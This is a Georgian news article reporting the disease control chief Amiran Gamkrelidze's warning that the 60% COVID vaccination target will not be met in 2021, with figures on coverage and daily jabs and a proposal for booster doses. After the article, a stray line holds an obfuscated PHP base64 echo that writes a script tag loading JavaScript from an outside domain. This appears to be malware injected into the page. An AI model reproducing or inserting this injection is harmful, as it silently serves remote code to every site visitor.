celsiusi
ავერსი საქკაბელი
"2021 წლის ბოლომდე ვაქცინაციის 60%-იან მაჩვენებელზე ვერ გავდივართ", - ამის შესახებ  დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმა ამირან გამყრელიძემ ონლაინ-პრესკონფერენციაზე განაცხადა.
 
მისი თქმით, მოსალოდნელია, რომ არსებული სტატისტიკის პირობებში, დეკემბრის ბოლომდე მოზრდილი მოსახლეობის 40% აიცრას.
 
"ყველამ ერთად უნდა ვეცადოთ და ავიცრათ. „ომიკრონის“ შემდგომი გავრცელების და სიტუაციის შემდგომი პრევენციის ერთადერთი საშუალება გვაქვს - ეს არის ვაქცინაცია. სამწუხაროდ, აცრის მოცვის მაჩვენებელი მაღალი არ გვაქვს. ორჯერადი აცრის მაჩვენებელი დღეისთვის არის 37.6%; მოცვა მაღალი არ არის და წლის ბოლომდე ალბათ მოზრდილი მოსახლეობის 40% აიცრება, 60%-იან მაჩვენებელზე ვერ გავდივართ. იმისთვის, რომ „ომიკრონმა“ მდგომარეობა არ გააუარესოს, უნდა ავიცრათ“, - განაცხადა ამირან გამყრელიძემ.
 
მისი თქმით, დღიურად აცრილთა რაოდენობა 10 ათასია, თუმცა საჭიროა დღეში 30 ათასი ადამიანი აიცრას, იმისთვის, რომ ეპიდემია შეჩერდეს.
 
გარდა ამისა, ამირან გამყრელიძის თქმით, აუცილებელია ე.წ. ბუსტერიზაცია. „შესაძლოა, უწყებათშორის საბჭოს წარვუდგინოთ წინადადება, რომ ორჯერადად აცცილებისთვის ე.წ. ბუსტერ-დოზით აცრა გახდეს აუცილებელი“, - აღნიშნა გამყრელიძემ.
857
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");